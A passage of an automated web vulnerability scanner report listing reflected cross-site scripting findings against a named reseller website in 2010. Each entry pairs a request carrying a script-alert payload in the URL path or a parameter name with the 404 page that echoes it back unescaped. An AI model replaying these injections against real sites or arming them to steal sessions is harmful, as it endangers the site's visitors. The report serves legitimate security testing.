<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2fe502<a>d49b7bb9fe8 was not found on this server.</p>
...[SNIP]...

2.3167. http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/white-label-seo-resellers-search-engine-optimisation.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 774f8<script>alert(1)</script>34f83a8a183 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail774f8<script>alert(1)</script>34f83a8a183/44/white-label-seo-resellers-search-engine-optimisation.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail774f8<script>alert(1)</script>34f83a8a183/44/white-label-seo-resellers-search-engine-optimisation.html was not found on this server.</p>
...[SNIP]...

2.3168. http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/44/white-label-seo-resellers-search-engine-optimisation.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c1b3<a>68fae54af39 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/444c1b3<a>68fae54af39/white-label-seo-resellers-search-engine-optimisation.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/444c1b3<a>68fae54af39/white-label-seo-resellers-search-engine-optimisation.html was not found on this server.</p>
...[SNIP]...

2.3169. http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/44/white-label-seo-resellers-search-engine-optimisation.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64193<script>alert(1)</script>b5a41d303fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/64193<script>alert(1)</script>b5a41d303fd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/64193<script>alert(1)</script>b5a41d303fd was not found on this server.</p>
...[SNIP]...

2.3170. http://www.resellerbase.com/detail/45/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1da14<script>alert(1)</script>22a58dc2953 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1da14<script>alert(1)</script>22a58dc2953/45/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1da14<script>alert(1)</script>22a58dc2953/45/ was not found on this server.</p>
...[SNIP]...

2.3171. http://www.resellerbase.com/detail/45/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b17c<script>alert(1)</script>5949b36fddd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/456b17c<script>alert(1)</script>5949b36fddd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/456b17c<script>alert(1)</script>5949b36fddd/ was not found on this server.</p>
...[SNIP]...

2.3172. http://www.resellerbase.com/detail/45/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2d22<script>alert(1)</script>9ef3a8732d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/?b2d22<script>alert(1)</script>9ef3a8732d8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.3173. http://www.resellerbase.com/detail/45/dograecorp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/dograecorp.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 552b4<script>alert(1)</script>ab4b2a570fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail552b4<script>alert(1)</script>ab4b2a570fd/45/dograecorp.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail552b4<script>alert(1)</script>ab4b2a570fd/45/dograecorp.html was not found on this server.</p>
...[SNIP]...

2.3174. http://www.resellerbase.com/detail/45/dograecorp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/dograecorp.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2d609<a>b0a53c690bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/452d609<a>b0a53c690bc/dograecorp.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/452d609<a>b0a53c690bc/dograecorp.html was not found on this server.</p>
...[SNIP]...

2.3175. http://www.resellerbase.com/detail/45/dograecorp.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/dograecorp.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 522b9<script>alert(1)</script>39f566658ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/522b9<script>alert(1)</script>39f566658ec HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/522b9<script>alert(1)</script>39f566658ec was not found on this server.</p>
...[SNIP]...

2.3176. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a59a8<script>alert(1)</script>d40084732f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila59a8<script>alert(1)</script>d40084732f7/45/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila59a8<script>alert(1)</script>d40084732f7/45/rating.php was not found on this server.</p>
...[SNIP]...

2.3177. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 594e6<script>alert(1)</script>2c4b335fdfb7c6460 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail594e6<script>alert(1)</script>2c4b335fdfb7c6460/45/rating.php?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail594e6<script>alert(1)</script>2c4b335fdfb7c6460/45/rating.php?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3178. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42afe<script>alert(1)</script>36a33176e2fc137ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/4542afe<script>alert(1)</script>36a33176e2fc137ea/rating.php?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4542afe<script>alert(1)</script>36a33176e2fc137ea/rating.php?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3179. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61fca<script>alert(1)</script>6c8905ef1d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4561fca<script>alert(1)</script>6c8905ef1d2/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4561fca<script>alert(1)</script>6c8905ef1d2/rating.php was not found on this server.</p>
...[SNIP]...

2.3180. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11d4a<script>alert(1)</script>d3572ac709f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/rating.php11d4a<script>alert(1)</script>d3572ac709f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php11d4a<script>alert(1)</script>d3572ac709f was not found on this server.</p>
...[SNIP]...

2.3181. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34ff1<script>alert(1)</script>fd43a952af9a24421 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/45/rating.php34ff1<script>alert(1)</script>fd43a952af9a24421?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php34ff1<script>alert(1)</script>fd43a952af9a24421?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3182. http://www.resellerbase.com/detail/45/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f7547<script>alert(1)</script>624c62f9383 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/rating.php?f7547<script>alert(1)</script>624c62f9383=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php?f7547<script>alert(1)</script>624c62f9383=1 was not found on this server.</p>
...[SNIP]...

2.3183. http://www.resellerbase.com/detail/45/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 66c98<script>alert(1)</script>513faa9401c8eaf52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/45/rating.php/66c98<script>alert(1)</script>513faa9401c8eaf52?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php/66c98<script>alert(1)</script>513faa9401c8eaf52?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3184. http://www.resellerbase.com/detail/45/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28f94<script>alert(1)</script>c0bb8e6bd87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail28f94<script>alert(1)</script>c0bb8e6bd87/45/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail28f94<script>alert(1)</script>c0bb8e6bd87/45/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3185. http://www.resellerbase.com/detail/45/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74651<script>alert(1)</script>9fa25c38f63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4574651<script>alert(1)</script>9fa25c38f63/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4574651<script>alert(1)</script>9fa25c38f63/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3186. http://www.resellerbase.com/detail/45/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd643<script>alert(1)</script>ca4097650ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

